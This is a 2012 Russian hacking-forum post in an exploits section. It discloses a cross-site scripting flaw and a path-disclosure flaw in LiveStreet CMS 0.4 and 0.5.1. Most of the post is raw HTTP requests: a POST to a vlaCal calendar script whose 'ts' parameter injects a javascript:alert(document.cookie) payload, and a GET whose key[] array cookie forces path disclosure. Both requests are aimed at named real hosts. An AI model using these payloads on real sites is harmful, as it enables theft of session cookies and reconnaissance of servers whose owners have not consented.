Livestreet 0.5.1 и в 0.4, XSS, Cross Site Scripting, раскрытие директории

Тема в разделе "Exploits |:| Vulnerabilities", создана пользователем Хулиган, 23 июн 2012.

  1. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    152
    Livestreet XSS + раскрытие директории в MooTools_1.2, vlaCal-v2.1​


    Livestreet XSS POST:

    File:
    Код:
    /engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/year.php
    Код:
    /engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/decade.php 
    Код:
    POST /engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/decade.php HTTP/1.1
    Content-Length: 53
    Content-Type: application/x-www-form-urlencoded
    Cookie: PHPSESSID=8223940c401233bbcffe59d6f2b7637d; _metrika_enabled=
    Host: blog.himic.ru
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
    Accept: */*
    
    ts=%22%20BACKGROUND%3djavascript:alert%28document.cookie%29%20bad%3d%22
    Раскрытие директории:

    Код:
    GET /index.php HTTP/1.1
    Cookie: PHPSESSID=8223940c401233bbcffe59d6f2b7637d; key[]=8223940c401233bbcffe59d6f2b7637d; _metrika_enabled=
    Host: Livestreet.ru
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
    Accept: */*
    source: http://blog.himic.ru/blog/security/162.html
     
    23 июн 2012
Загрузка...